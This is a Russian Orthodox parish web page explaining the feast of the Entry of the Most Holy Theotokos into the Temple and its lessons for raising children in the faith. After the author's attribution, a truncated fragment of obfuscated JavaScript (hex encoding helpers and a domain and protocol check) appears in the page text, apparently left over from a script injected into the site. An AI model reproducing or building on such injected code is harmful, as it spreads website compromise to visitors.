ПРАЗДНИК ВВЕДЕНИЯ ВО ХРАМ ПРЕСВЯТОЙ  БОГОРОДИЦЫ.

4 декабря  —   Святая Православная церковь празднует  Введение во храм Пресвятой Богородицы. История этого праздника такова. Праведные  Иоаким и Анна, будучи долгое время  бездетны,  усердно   молили  Бога  о ниспослании им дитяти. Они дали обет в случае рождения ребёнка посвятить его Богу.  И вот Господь  даровал  им Дочь, которую они называют   Марией. Три года  Мария  жила с ними, а на четвёртом году по данному обету Иоаким и Анна привели дитя  в храм. Это было торжественное событие — они созвали своих родственников,  пригласили сверстниц Марии, одели Её в лучшие одежды, и, провожаемые народом, под пение духовных песен  повели Её в храм для посвящения Богу. Девочка  сама поднялась по ступенькам храма. Это было пятнадцать больших ступенек по числу псалмов, которые пели священники при входе в храм. В храме Мария была встречена  священниками и левитами, и вот совершилось необычное —  первосвященник ввёл  Её  во святая святых. Святая святых – это  та часть храма, куда  и сам первосвященник мог входить только один раз в год. То, что маленькая девочка была введена священником в это святое место, указывало на  Её особое предназначение. С тех пор Дева Мария осталась жить при храме, без родителей,  до известного времени.  Там она обучалась закону Божию и рукоделию,  много молилась и читала Священное Писание. При храме Дева Мария жила около одиннадцати  лет.  Она была скромна, трудолюбива  и послушна. Пресвятая Дева Мария решила  не выходить замуж,  навсегда остаться Девой и всю свою жизнь посвятить  Богу. Такой  чистой  Деве  и дано было стать Матерью Христа – Спасителя, Сына Божия,  Мессии, пришествие, в мир которого  предвещали древние пророки.  Со  времени Введения  Её во храм и  до Своего  Святого Успения  Пресвятая Богородица  была во всём  послушна Богу. Так же праведно жили Её родители,  и такое  Она получила воспитание в святом храме.

 Когда человек крестится, становится христианином —  он отрекается от сатаны и его лукавых дел и сочетается со Христом. Такое обещание он даёт при совершении таинства крещения. Это уже обет. И от того, как мы,  христиане,  его  выполняем, зависит наша настоящая и будущая жизнь. Мы приводим  в храм своих детей, чтобы освятить их Божьей благодатью, чтобы  они  были с Богом. С введения крещёного человека в храм начинается  его  дорога в вечность – к Творцу,  в Небесное Отечество — через труды и  молитвы. Пресвятая Богородица пришла в мир по молитвам праведных родителей. Поэтому чтобы наша молитва была услышана, мы также должны стараться жить праведно,  то есть по закону Божию. Нам следует просить у Пресвятой Богородицы помощи в воспитании в себе и в наших детях добродетелей веры, любви. Когда человек соприкасается со святынями, слушает Божественное Слово  — это  воздействует на его душу. «Пустите детей приходить ко мне» — говорит Господь.  Маленькие дети  особо чутки ко всему святому, доброму, чистому. В храме воспитывается детская душа, укрепляется в таинствах. Очень важны родительские примеры и родительская молитва. Детям следует рассказывать о жизни Пресвятой Богородицы,  приводить примеры из житий святых. Хорошие  примеры, как и доброе окружение, воспитывают добрые нравы. Введение во храм Пресвятой Богородицы  – особый церковный праздник. В такой день, как правило в храмах много детей.  Верующие родители стараются в этот праздник приводить их туда,  где на аналое  лежит  икона,  на которой маленькая Святая Дева Мария восходит по лестнице в храм. Церковные молитвы,  прославляющие Пресвятую Богородицу, а также благодарственные ко  Творцу  за нашу Великую Заступницу и Ходатаицу возносятся в этот день к Престолу Божию. Мы просим Владычицу,  чтобы она помогла нам в добром воспитании наших детей,  уцеломудрила их жизнь. Праздник Введения во храм Пресвятой Богородицы  учит тому, насколько важен храм для воспитания и жизни христианина.

( По материалам православных изданий подготовила С. Г. Ворончук, храм Преображения Господня гор. Муравленко)

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "muravlenko.cerkov.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Просмотры: (21)

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *